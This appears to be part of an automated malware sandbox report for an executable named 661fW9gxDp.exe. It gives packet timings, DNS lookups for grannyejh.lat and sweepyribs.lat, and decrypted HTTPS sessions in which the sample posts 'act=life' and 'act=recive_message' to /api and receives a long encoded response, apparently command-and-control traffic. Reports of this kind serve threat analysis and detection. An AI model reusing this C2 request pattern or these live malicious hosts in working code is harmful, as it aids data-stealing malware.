Dec 19, 2024 08:36:36.741069078 CET  443          49723      104.21.64.80  192.168.2.9
Dec 19, 2024 08:36:37.545023918 CET  443          49723      104.21.64.80  192.168.2.9
Dec 19, 2024 08:36:37.545072079 CET  443          49723      104.21.64.80  192.168.2.9
                                                                                                                Dec 19, 2024 08:36:37.545166016 CET49723443192.168.2.9104.21.64.80
                                                                                                                Dec 19, 2024 08:36:37.545233011 CET44349723104.21.64.80192.168.2.9
                                                                                                                Dec 19, 2024 08:36:37.545937061 CET44349723104.21.64.80192.168.2.9
                                                                                                                Dec 19, 2024 08:36:37.545996904 CET49723443192.168.2.9104.21.64.80
                                                                                                                Dec 19, 2024 08:36:37.546027899 CET44349723104.21.64.80192.168.2.9
                                                                                                                Dec 19, 2024 08:36:37.547962904 CET44349723104.21.64.80192.168.2.9
                                                                                                                Dec 19, 2024 08:36:37.548022985 CET49723443192.168.2.9104.21.64.80
                                                                                                                Dec 19, 2024 08:36:37.548055887 CET44349723104.21.64.80192.168.2.9
                                                                                                                Dec 19, 2024 08:36:37.557467937 CET44349723104.21.64.80192.168.2.9
                                                                                                                Dec 19, 2024 08:36:37.557557106 CET49723443192.168.2.9104.21.64.80
                                                                                                                Dec 19, 2024 08:36:37.557579994 CET44349723104.21.64.80192.168.2.9
                                                                                                                Dec 19, 2024 08:36:37.565898895 CET44349723104.21.64.80192.168.2.9
                                                                                                                Dec 19, 2024 08:36:37.565979958 CET49723443192.168.2.9104.21.64.80
                                                                                                                Dec 19, 2024 08:36:37.566001892 CET44349723104.21.64.80192.168.2.9
                                                                                                                Dec 19, 2024 08:36:37.617629051 CET49723443192.168.2.9104.21.64.80
                                                                                                                Dec 19, 2024 08:36:37.664643049 CET44349723104.21.64.80192.168.2.9
                                                                                                                Dec 19, 2024 08:36:37.711366892 CET49723443192.168.2.9104.21.64.80
                                                                                                                Dec 19, 2024 08:36:37.736402988 CET44349723104.21.64.80192.168.2.9
                                                                                                                Dec 19, 2024 08:36:37.740313053 CET44349723104.21.64.80192.168.2.9
                                                                                                                Dec 19, 2024 08:36:37.740372896 CET49723443192.168.2.9104.21.64.80
                                                                                                                Dec 19, 2024 08:36:37.740411043 CET44349723104.21.64.80192.168.2.9
                                                                                                                Dec 19, 2024 08:36:37.740565062 CET44349723104.21.64.80192.168.2.9
                                                                                                                Dec 19, 2024 08:36:37.740617990 CET49723443192.168.2.9104.21.64.80
                                                                                                                Dec 19, 2024 08:36:37.740744114 CET49723443192.168.2.9104.21.64.80
                                                                                                                Dec 19, 2024 08:36:37.740783930 CET44349723104.21.64.80192.168.2.9
                                                                                                                Dec 19, 2024 08:36:37.740813971 CET49723443192.168.2.9104.21.64.80
                                                                                                                Dec 19, 2024 08:36:37.740828991 CET44349723104.21.64.80192.168.2.9
                                                                                                                Dec 19, 2024 08:36:37.984709978 CET49728443192.168.2.9104.21.64.80
                                                                                                                Dec 19, 2024 08:36:37.984746933 CET44349728104.21.64.80192.168.2.9
                                                                                                                Dec 19, 2024 08:36:37.984812975 CET49728443192.168.2.9104.21.64.80
                                                                                                                Dec 19, 2024 08:36:37.985282898 CET49728443192.168.2.9104.21.64.80
                                                                                                                Dec 19, 2024 08:36:37.985297918 CET44349728104.21.64.80192.168.2.9
                                                                                                                Dec 19, 2024 08:36:39.215637922 CET44349728104.21.64.80192.168.2.9
                                                                                                                Dec 19, 2024 08:36:39.215751886 CET49728443192.168.2.9104.21.64.80
                                                                                                                Dec 19, 2024 08:36:39.217032909 CET49728443192.168.2.9104.21.64.80
                                                                                                                Dec 19, 2024 08:36:39.217075109 CET44349728104.21.64.80192.168.2.9
                                                                                                                Dec 19, 2024 08:36:39.217317104 CET44349728104.21.64.80192.168.2.9
                                                                                                                Dec 19, 2024 08:36:39.218585014 CET49728443192.168.2.9104.21.64.80
                                                                                                                Dec 19, 2024 08:36:39.218725920 CET49728443192.168.2.9104.21.64.80
                                                                                                                Dec 19, 2024 08:36:39.218760014 CET44349728104.21.64.80192.168.2.9
                                                                                                                Dec 19, 2024 08:36:40.183635950 CET44349728104.21.64.80192.168.2.9
                                                                                                                Dec 19, 2024 08:36:40.183744907 CET44349728104.21.64.80192.168.2.9
                                                                                                                Dec 19, 2024 08:36:40.183798075 CET49728443192.168.2.9104.21.64.80
                                                                                                                Dec 19, 2024 08:36:40.183902025 CET49728443192.168.2.9104.21.64.80
                                                                                                                Dec 19, 2024 08:36:40.183917999 CET44349728104.21.64.80192.168.2.9
                                                                                                                Dec 19, 2024 08:36:40.280189037 CET49734443192.168.2.9104.21.64.80
                                                                                                                Dec 19, 2024 08:36:40.280231953 CET44349734104.21.64.80192.168.2.9
                                                                                                                Dec 19, 2024 08:36:40.280328035 CET49734443192.168.2.9104.21.64.80
                                                                                                                Dec 19, 2024 08:36:40.280627966 CET49734443192.168.2.9104.21.64.80
                                                                                                                Dec 19, 2024 08:36:40.280642033 CET44349734104.21.64.80192.168.2.9
                                                                                                                Dec 19, 2024 08:36:41.494929075 CET44349734104.21.64.80192.168.2.9
                                                                                                                Dec 19, 2024 08:36:41.495031118 CET49734443192.168.2.9104.21.64.80
                                                                                                                Dec 19, 2024 08:36:41.496414900 CET49734443192.168.2.9104.21.64.80
                                                                                                                Dec 19, 2024 08:36:41.496444941 CET44349734104.21.64.80192.168.2.9
                                                                                                                Dec 19, 2024 08:36:41.496838093 CET44349734104.21.64.80192.168.2.9
                                                                                                                Dec 19, 2024 08:36:41.498105049 CET49734443192.168.2.9104.21.64.80
                                                                                                                Dec 19, 2024 08:36:41.498291016 CET49734443192.168.2.9104.21.64.80
                                                                                                                Dec 19, 2024 08:36:41.498337984 CET44349734104.21.64.80192.168.2.9
                                                                                                                Dec 19, 2024 08:36:41.498393059 CET49734443192.168.2.9104.21.64.80
                                                                                                                Dec 19, 2024 08:36:41.543339014 CET44349734104.21.64.80192.168.2.9
                                                                                                                Dec 19, 2024 08:36:42.363426924 CET44349734104.21.64.80192.168.2.9
                                                                                                                Dec 19, 2024 08:36:42.363554001 CET44349734104.21.64.80192.168.2.9
                                                                                                                Dec 19, 2024 08:36:42.363723993 CET49734443192.168.2.9104.21.64.80
                                                                                                                Dec 19, 2024 08:36:42.363982916 CET49734443192.168.2.9104.21.64.80
                                                                                                                Dec 19, 2024 08:36:42.364003897 CET44349734104.21.64.80192.168.2.9
                                                                                                                Dec 19, 2024 08:36:42.545492887 CET49742443192.168.2.9104.21.64.80
                                                                                                                Dec 19, 2024 08:36:42.545536995 CET44349742104.21.64.80192.168.2.9
                                                                                                                Dec 19, 2024 08:36:42.545607090 CET49742443192.168.2.9104.21.64.80
                                                                                                                Dec 19, 2024 08:36:42.545905113 CET49742443192.168.2.9104.21.64.80
                                                                                                                Dec 19, 2024 08:36:42.545916080 CET44349742104.21.64.80192.168.2.9
                                                                                                                Dec 19, 2024 08:36:43.756840944 CET44349742104.21.64.80192.168.2.9
                                                                                                                Dec 19, 2024 08:36:43.756932974 CET49742443192.168.2.9104.21.64.80
                                                                                                                Dec 19, 2024 08:36:43.758394957 CET49742443192.168.2.9104.21.64.80
                                                                                                                Dec 19, 2024 08:36:43.758400917 CET44349742104.21.64.80192.168.2.9
                                                                                                                Dec 19, 2024 08:36:43.758627892 CET44349742104.21.64.80192.168.2.9
                                                                                                                Dec 19, 2024 08:36:43.760005951 CET49742443192.168.2.9104.21.64.80
                                                                                                                Dec 19, 2024 08:36:43.760169029 CET49742443192.168.2.9104.21.64.80
                                                                                                                Dec 19, 2024 08:36:43.760190964 CET44349742104.21.64.80192.168.2.9
                                                                                                                Dec 19, 2024 08:36:43.760258913 CET49742443192.168.2.9104.21.64.80
                                                                                                                Dec 19, 2024 08:36:43.760267973 CET44349742104.21.64.80192.168.2.9
                                                                                                                Dec 19, 2024 08:36:44.763829947 CET44349742104.21.64.80192.168.2.9
                                                                                                                Dec 19, 2024 08:36:44.763941050 CET44349742104.21.64.80192.168.2.9
                                                                                                                Dec 19, 2024 08:36:44.763993025 CET49742443192.168.2.9104.21.64.80
                                                                                                                Dec 19, 2024 08:36:44.766139984 CET49742443192.168.2.9104.21.64.80
                                                                                                                Dec 19, 2024 08:36:44.766154051 CET44349742104.21.64.80192.168.2.9
                                                                                                                Dec 19, 2024 08:36:45.352207899 CET49749443192.168.2.9104.21.64.80
                                                                                                                Dec 19, 2024 08:36:45.352261066 CET44349749104.21.64.80192.168.2.9
                                                                                                                Dec 19, 2024 08:36:45.352314949 CET49749443192.168.2.9104.21.64.80
                                                                                                                Dec 19, 2024 08:36:45.352663994 CET49749443192.168.2.9104.21.64.80
                                                                                                                Dec 19, 2024 08:36:45.352674007 CET44349749104.21.64.80192.168.2.9
                                                                                                                Dec 19, 2024 08:36:46.568013906 CET44349749104.21.64.80192.168.2.9
                                                                                                                Dec 19, 2024 08:36:46.568113089 CET49749443192.168.2.9104.21.64.80
                                                                                                                Dec 19, 2024 08:36:46.569375038 CET49749443192.168.2.9104.21.64.80
                                                                                                                Dec 19, 2024 08:36:46.569385052 CET44349749104.21.64.80192.168.2.9
                                                                                                                Dec 19, 2024 08:36:46.569622040 CET44349749104.21.64.80192.168.2.9
                                                                                                                Dec 19, 2024 08:36:46.571120977 CET49749443192.168.2.9104.21.64.80
                                                                                                                Dec 19, 2024 08:36:46.571214914 CET49749443192.168.2.9104.21.64.80
                                                                                                                Dec 19, 2024 08:36:46.571222067 CET44349749104.21.64.80192.168.2.9
                                                                                                                Dec 19, 2024 08:36:47.431180954 CET44349749104.21.64.80192.168.2.9
                                                                                                                Dec 19, 2024 08:36:47.431267023 CET44349749104.21.64.80192.168.2.9
                                                                                                                Dec 19, 2024 08:36:47.431340933 CET49749443192.168.2.9104.21.64.80
                                                                                                                Dec 19, 2024 08:36:47.431551933 CET49749443192.168.2.9104.21.64.80
                                                                                                                Dec 19, 2024 08:36:47.431566000 CET44349749104.21.64.80192.168.2.9
                                                                                                                Dec 19, 2024 08:36:48.070538998 CET49758443192.168.2.9104.21.64.80
                                                                                                                Dec 19, 2024 08:36:48.070600986 CET44349758104.21.64.80192.168.2.9
                                                                                                                Dec 19, 2024 08:36:48.070710897 CET49758443192.168.2.9104.21.64.80
                                                                                                                Dec 19, 2024 08:36:48.071139097 CET49758443192.168.2.9104.21.64.80
                                                                                                                Dec 19, 2024 08:36:48.071156979 CET44349758104.21.64.80192.168.2.9
                                                                                                                Dec 19, 2024 08:36:49.282565117 CET44349758104.21.64.80192.168.2.9
                                                                                                                Dec 19, 2024 08:36:49.282618999 CET49758443192.168.2.9104.21.64.80
                                                                                                                Dec 19, 2024 08:36:49.283720970 CET49758443192.168.2.9104.21.64.80
                                                                                                                Dec 19, 2024 08:36:49.283730030 CET44349758104.21.64.80192.168.2.9
                                                                                                                Dec 19, 2024 08:36:49.283958912 CET44349758104.21.64.80192.168.2.9
                                                                                                                Dec 19, 2024 08:36:49.285253048 CET49758443192.168.2.9104.21.64.80
                                                                                                                Dec 19, 2024 08:36:49.285990953 CET49758443192.168.2.9104.21.64.80
                                                                                                                Dec 19, 2024 08:36:49.286032915 CET44349758104.21.64.80192.168.2.9
                                                                                                                Dec 19, 2024 08:36:49.286117077 CET49758443192.168.2.9104.21.64.80
                                                                                                                Dec 19, 2024 08:36:49.286138058 CET44349758104.21.64.80192.168.2.9
                                                                                                                Dec 19, 2024 08:36:49.286231041 CET49758443192.168.2.9104.21.64.80
                                                                                                                Dec 19, 2024 08:36:49.286258936 CET44349758104.21.64.80192.168.2.9
                                                                                                                Dec 19, 2024 08:36:49.286354065 CET49758443192.168.2.9104.21.64.80
                                                                                                                Dec 19, 2024 08:36:49.286375046 CET44349758104.21.64.80192.168.2.9
                                                                                                                Dec 19, 2024 08:36:49.286473036 CET49758443192.168.2.9104.21.64.80
                                                                                                                Dec 19, 2024 08:36:49.286505938 CET44349758104.21.64.80192.168.2.9
                                                                                                                Dec 19, 2024 08:36:49.286626101 CET49758443192.168.2.9104.21.64.80
                                                                                                                Dec 19, 2024 08:36:49.286643982 CET49758443192.168.2.9104.21.64.80
                                                                                                                Dec 19, 2024 08:36:49.331324100 CET44349758104.21.64.80192.168.2.9
                                                                                                                Dec 19, 2024 08:36:49.331470966 CET49758443192.168.2.9104.21.64.80
                                                                                                                Dec 19, 2024 08:36:49.331506968 CET49758443192.168.2.9104.21.64.80
                                                                                                                Dec 19, 2024 08:36:49.379323006 CET44349758104.21.64.80192.168.2.9
                                                                                                                Dec 19, 2024 08:36:49.379447937 CET49758443192.168.2.9104.21.64.80
                                                                                                                Dec 19, 2024 08:36:49.379483938 CET49758443192.168.2.9104.21.64.80
                                                                                                                Dec 19, 2024 08:36:49.379496098 CET49758443192.168.2.9104.21.64.80
                                                                                                                Dec 19, 2024 08:36:49.423327923 CET44349758104.21.64.80192.168.2.9
                                                                                                                Dec 19, 2024 08:36:49.423486948 CET49758443192.168.2.9104.21.64.80
                                                                                                                Dec 19, 2024 08:36:49.423521996 CET49758443192.168.2.9104.21.64.80
                                                                                                                Dec 19, 2024 08:36:49.471330881 CET44349758104.21.64.80192.168.2.9
                                                                                                                Dec 19, 2024 08:36:49.471445084 CET49758443192.168.2.9104.21.64.80
                                                                                                                Dec 19, 2024 08:36:49.515336990 CET44349758104.21.64.80192.168.2.9
                                                                                                                Dec 19, 2024 08:36:49.527796984 CET44349758104.21.64.80192.168.2.9
                                                                                                                Dec 19, 2024 08:36:49.527940035 CET49758443192.168.2.9104.21.64.80
                                                                                                                Dec 19, 2024 08:36:49.527976990 CET44349758104.21.64.80192.168.2.9
                                                                                                                Dec 19, 2024 08:36:49.647670984 CET44349758104.21.64.80192.168.2.9
                                                                                                                Dec 19, 2024 08:36:52.634711027 CET44349758104.21.64.80192.168.2.9
                                                                                                                Dec 19, 2024 08:36:52.634804010 CET44349758104.21.64.80192.168.2.9
                                                                                                                Dec 19, 2024 08:36:52.634963989 CET49758443192.168.2.9104.21.64.80
                                                                                                                Dec 19, 2024 08:36:52.635155916 CET49758443192.168.2.9104.21.64.80
                                                                                                                Dec 19, 2024 08:36:52.635178089 CET44349758104.21.64.80192.168.2.9
                                                                                                                Dec 19, 2024 08:36:52.668678999 CET49769443192.168.2.9104.21.64.80
                                                                                                                Dec 19, 2024 08:36:52.668721914 CET44349769104.21.64.80192.168.2.9
                                                                                                                Dec 19, 2024 08:36:52.668828964 CET49769443192.168.2.9104.21.64.80
                                                                                                                Dec 19, 2024 08:36:52.669187069 CET49769443192.168.2.9104.21.64.80
                                                                                                                Dec 19, 2024 08:36:52.669202089 CET44349769104.21.64.80192.168.2.9
                                                                                                                Dec 19, 2024 08:36:53.055357933 CET49769443192.168.2.9104.21.64.80
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 19, 2024 08:36:33.085082054 CET | 58066 | 53 | 192.168.2.9 | 1.1.1.1
Dec 19, 2024 08:36:33.222780943 CET | 53 | 58066 | 1.1.1.1 | 192.168.2.9
Dec 19, 2024 08:36:33.224766970 CET | 65432 | 53 | 192.168.2.9 | 1.1.1.1
Dec 19, 2024 08:36:33.362574100 CET | 53 | 65432 | 1.1.1.1 | 192.168.2.9
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 19, 2024 08:36:33.085082054 CET | 192.168.2.9 | 1.1.1.1 | 0x38fc | Standard query (0) | sweepyribs.lat | A (IP address) | IN (0x0001) | false
Dec 19, 2024 08:36:33.224766970 CET | 192.168.2.9 | 1.1.1.1 | 0xbcd2 | Standard query (0) | grannyejh.lat | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 19, 2024 08:36:26.682127953 CET | 1.1.1.1 | 192.168.2.9 | 0xef8c | No error (0) | shed.dual-low.s-part-0035.t-0009.t-msedge.net | s-part-0035.t-0009.t-msedge.net | | CNAME (Canonical name) | IN (0x0001) | false
Dec 19, 2024 08:36:26.682127953 CET | 1.1.1.1 | 192.168.2.9 | 0xef8c | No error (0) | s-part-0035.t-0009.t-msedge.net | | 13.107.246.63 | A (IP address) | IN (0x0001) | false
Dec 19, 2024 08:36:33.222780943 CET | 1.1.1.1 | 192.168.2.9 | 0x38fc | Name error (3) | sweepyribs.lat | none | none | A (IP address) | IN (0x0001) | false
Dec 19, 2024 08:36:33.362574100 CET | 1.1.1.1 | 192.168.2.9 | 0xbcd2 | No error (0) | grannyejh.lat | | 104.21.64.80 | A (IP address) | IN (0x0001) | false
Dec 19, 2024 08:36:33.362574100 CET | 1.1.1.1 | 192.168.2.9 | 0xbcd2 | No error (0) | grannyejh.lat | | 172.67.179.109 | A (IP address) | IN (0x0001) | false
• grannyejh.lat
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.9 | 49717 | 104.21.64.80 | 443 | 7684 | C:\Users\user\Desktop\661fW9gxDp.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-19 07:36:34 UTC | 260 | OUT | POST /api HTTP/1.1
                                                                                                                Connection: Keep-Alive
                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                Content-Length: 8
                                                                                                                Host: grannyejh.lat
2024-12-19 07:36:34 UTC | 8 | OUT | Data Raw: 61 63 74 3d 6c 69 66 65
Data Ascii: act=life
2024-12-19 07:36:35 UTC | 1115 | IN | HTTP/1.1 200 OK
                                                                                                                Date: Thu, 19 Dec 2024 07:36:35 GMT
                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                Transfer-Encoding: chunked
                                                                                                                Connection: close
                                                                                                                Set-Cookie: PHPSESSID=oivgeqf2t1nu15hlrq2q46a0cr; expires=Mon, 14 Apr 2025 01:23:14 GMT; Max-Age=9999999; path=/
                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                Pragma: no-cache
                                                                                                                X-Frame-Options: DENY
                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                vary: accept-encoding
                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3i7OX91XQuHdv%2BaXr4ea68AfeGdPdgfZWTgwRM2f4fA5qpiQHO7g5OyA3FYivZ4KzxQfbe0Y1amC908KBVbVG6Kmz%2F61oKCDt2MQqjcsqJZLkeVfYdNxvoPyWMlqQToO"}],"group":"cf-nel","max_age":604800}
                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                Server: cloudflare
                                                                                                                CF-RAY: 8f45b8f209e472ad-EWR
                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1800&min_rtt=1793&rtt_var=686&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2830&recv_bytes=904&delivery_rate=1579232&cwnd=234&unsent_bytes=0&cid=901e5c6fc00067b5&ts=930&x=0"
2024-12-19 07:36:35 UTC | 7 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a
Data Ascii: 2ok
2024-12-19 07:36:35 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.9 | 49723 | 104.21.64.80 | 443 | 7684 | C:\Users\user\Desktop\661fW9gxDp.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-19 07:36:36 UTC | 261 | OUT | POST /api HTTP/1.1
                                                                                                                Connection: Keep-Alive
                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                Content-Length: 47
                                                                                                                Host: grannyejh.lat
2024-12-19 07:36:36 UTC | 47 | OUT | Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 26 6a 3d
Data Ascii: act=recive_message&ver=4.0&lid=PsFKDg--pablo&j=
2024-12-19 07:36:37 UTC | 1117 | IN | HTTP/1.1 200 OK
                                                                                                                Date: Thu, 19 Dec 2024 07:36:37 GMT
                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                Transfer-Encoding: chunked
                                                                                                                Connection: close
                                                                                                                Set-Cookie: PHPSESSID=bveru2idb18ugrsev59970gic8; expires=Mon, 14 Apr 2025 01:23:16 GMT; Max-Age=9999999; path=/
                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                Pragma: no-cache
                                                                                                                X-Frame-Options: DENY
                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                vary: accept-encoding
                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gGVWM2XhLOsogfuBJzj6Gt4F%2FP4vNabd%2BbBVxQdKeeM28fSSHL4J8T4vy99PBBrk2YJ1CHdG3g76SkebfFHuJwpV5jPoD2YE4TmYhWNvcRS6f7U0QKRd%2FozS12Jnisg5"}],"group":"cf-nel","max_age":604800}
                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                Server: cloudflare
                                                                                                                CF-RAY: 8f45b8ff4d0642cf-EWR
                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1573&min_rtt=1565&rtt_var=604&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2830&recv_bytes=944&delivery_rate=1785932&cwnd=252&unsent_bytes=0&cid=f3861ad3341518a5&ts=821&x=0"
                                                                                                                2024-12-19 07:36:37 UTC252INData Raw: 34 39 31 63 0d 0a 67 6c 30 30 68 6b 6e 45 54 4f 36 6a 70 65 35 36 2b 59 4f 2b 42 6f 2f 69 39 75 6f 57 55 74 36 79 36 47 62 4c 71 6d 43 6b 6a 51 50 35 66 30 4b 6b 63 2f 42 67 7a 4e 44 41 7a 45 43 4e 38 63 74 6a 6f 38 43 58 6a 6a 52 6f 75 4e 4f 45 46 61 36 47 51 74 4c 67 49 62 67 37 56 65 6f 36 6f 57 44 4d 78 74 33 4d 51 4b 4c 34 6e 47 50 68 77 4d 7a 49 63 7a 69 38 30 34 51 45 71 73 45 50 31 4f 46 67 36 6a 46 54 37 69 79 6e 4b 49 2f 50 79 49 73 66 6e 4f 4c 55 61 4f 61 50 6e 6f 63 30 66 76 7a 58 6b 6b 54 78 69 43 33 42 2b 57 4c 50 50 45 66 74 61 37 6c 67 6c 59 48 41 67 46 6a 44 6f 64 39 6a 37 59 36 51 6a 6e 30 36 74 74 71 4d 42 61 2f 41 45 4d 33 72 61 2b 6f 2f 55 4f 38 6d 72 6a 79 43 78 63 2b 41 47 5a 62 69 6e 43 71 74 68 34 7a 49 4c 48 44 76 34 6f
                                                                                                                Data Ascii: 491cgl00hknETO6jpe56+YO+Bo/i9uoWUt6y6GbLqmCkjQP5f0Kkc/BgzNDAzECN8ctjo8CXjjRouNOEFa6GQtLgIbg7Veo6oWDMxt3MQKL4nGPhwMzIczi804QEqsEP1OFg6jFT7iynKI/PyIsfnOLUaOaPnoc0fvzXkkTxiC3B+WLPPEfta7lglYHAgFjDod9j7Y6Qjn06ttqMBa/AEM3ra+o/UO8mrjyCxc+AGZbinCqth4zILHDv4o
                                                                                                                2024-12-19 07:36:37 UTC1369INData Raw: 6b 56 75 4e 30 50 31 75 6b 68 2f 33 46 50 70 43 79 71 62 74 53 42 7a 34 41 57 6e 75 4c 54 59 2b 79 41 68 6f 64 30 4d 37 54 59 6a 67 36 6d 78 77 33 49 35 57 62 6f 4e 6c 48 72 4c 4b 34 6f 67 38 4b 48 77 6c 69 63 2b 5a 77 38 72 61 43 45 69 33 63 6b 73 63 48 4b 47 2b 66 52 51 73 48 6a 49 62 68 2f 55 4f 6f 71 71 79 36 65 79 63 79 48 48 59 6e 71 31 57 6e 67 67 4a 6d 43 65 7a 4f 38 31 34 41 4f 70 73 49 47 79 2b 4a 6e 34 44 38 57 71 6d 75 68 4e 73 79 5a 68 36 38 64 69 2b 62 51 63 71 2b 36 31 4a 63 36 4b 66 7a 58 68 6b 54 78 69 41 72 44 37 47 4c 72 4d 46 58 73 49 4c 51 75 6e 73 66 4b 69 51 71 64 35 4e 4a 75 37 70 4b 65 68 6e 49 7a 74 64 75 44 41 61 37 4d 51 6f 69 76 5a 76 68 2f 44 71 51 4b 71 79 57 41 79 39 43 4d 57 49 53 76 78 53 54 71 6a 4e 54 51 4e 44 53 39 31
                                                                                                                Data Ascii: kVuN0P1ukh/3FPpCyqbtSBz4AWnuLTY+yAhod0M7TYjg6mxw3I5WboNlHrLK4og8KHwlic+Zw8raCEi3ckscHKG+fRQsHjIbh/UOoqqy6eycyHHYnq1WnggJmCezO814AOpsIGy+Jn4D8WqmuhNsyZh68di+bQcq+61Jc6KfzXhkTxiArD7GLrMFXsILQunsfKiQqd5NJu7pKehnIztduDAa7MQoivZvh/DqQKqyWAy9CMWISvxSTqjNTQNDS91
                                                                                                                2024-12-19 07:36:37 UTC1369INData Raw: 50 47 6f 61 33 49 63 6f 38 51 75 63 68 35 42 75 50 7a 38 6d 4c 44 74 76 2b 6b 6e 32 74 68 35 6a 49 4c 48 43 78 30 59 49 43 75 38 63 50 78 65 46 76 37 7a 70 5a 37 43 75 6d 49 34 6e 46 7a 49 63 62 6c 75 58 4f 62 75 32 49 6b 59 6c 2b 4f 76 79 65 79 67 4f 78 69 46 71 47 33 6e 62 72 66 57 50 6e 4a 61 67 70 6d 6f 48 59 77 67 48 62 35 74 41 6b 74 63 43 5a 67 48 45 31 73 39 47 41 43 71 7a 43 44 73 37 68 59 76 49 77 55 75 51 6e 72 69 53 42 7a 38 4f 45 45 5a 44 71 32 6d 54 73 69 74 54 47 4e 44 65 6b 6b 4e 4a 45 6e 63 38 4f 79 2b 41 6a 31 54 78 59 36 69 79 77 62 70 4f 50 33 73 77 66 6c 36 47 45 4a 4f 47 4a 6c 49 4e 2b 4e 4c 7a 58 68 77 47 71 7a 77 48 4c 36 47 76 75 4f 46 4c 6f 49 71 73 6f 6a 4d 62 44 69 51 71 65 36 4e 42 6f 72 63 37 55 6a 32 78 77 35 4a 43 6c 41 37
                                                                                                                Data Ascii: PGoa3Ico8Quch5BuPz8mLDtv+kn2th5jILHCx0YICu8cPxeFv7zpZ7CumI4nFzIcbluXObu2IkYl+OvyeygOxiFqG3nbrfWPnJagpmoHYwgHb5tAktcCZgHE1s9GACqzCDs7hYvIwUuQnriSBz8OEEZDq2mTsitTGNDekkNJEnc8Oy+Aj1TxY6iywbpOP3swfl6GEJOGJlIN+NLzXhwGqzwHL6GvuOFLoIqsojMbDiQqe6NBorc7Uj2xw5JClA7
                                                                                                                2024-12-19 07:36:37 UTC1369INData Raw: 35 6d 6a 79 4d 56 6a 74 4a 71 41 6d 69 38 2f 4b 68 78 36 51 35 74 74 69 34 49 69 5a 6a 58 63 78 75 4e 71 59 42 36 4c 43 44 38 79 76 4c 36 41 34 54 71 52 7a 35 67 6d 41 36 4e 65 58 43 6f 32 68 77 79 72 30 77 4a 4f 45 4e 47 6a 38 30 34 55 4e 70 73 41 4b 79 65 42 6c 37 6a 6c 51 36 53 36 70 4a 4a 37 4a 79 59 45 54 6c 4f 72 4f 5a 4f 43 45 6d 49 78 38 4f 37 61 51 78 45 53 75 30 45 4b 65 72 31 54 74 4d 46 62 6e 50 65 59 78 77 74 69 48 69 78 54 62 75 5a 78 6f 34 34 43 62 68 48 67 37 74 4e 47 47 43 71 37 4e 43 38 37 6e 63 2b 45 37 58 75 55 6c 71 53 2b 49 78 4d 4b 49 48 35 2f 6e 30 79 53 6a 77 4a 4f 51 4e 47 6a 38 2f 36 30 78 36 2b 6b 34 68 76 41 76 2b 58 39 52 36 47 76 2b 62 6f 44 43 79 34 51 58 6e 65 6a 51 62 75 53 4c 6d 49 4e 77 50 4c 58 56 6a 41 57 73 7a 51 50
                                                                                                                Data Ascii: 5mjyMVjtJqAmi8/Khx6Q5tti4IiZjXcxuNqYB6LCD8yvL6A4TqRz5gmA6NeXCo2hwyr0wJOENGj804UNpsAKyeBl7jlQ6S6pJJ7JyYETlOrOZOCEmIx8O7aQxESu0EKer1TtMFbnPeYxwtiHixTbuZxo44CbhHg7tNGGCq7NC87nc+E7XuUlqS+IxMKIH5/n0ySjwJOQNGj8/60x6+k4hvAv+X9R6Gv+boDCy4QXnejQbuSLmINwPLXVjAWszQP
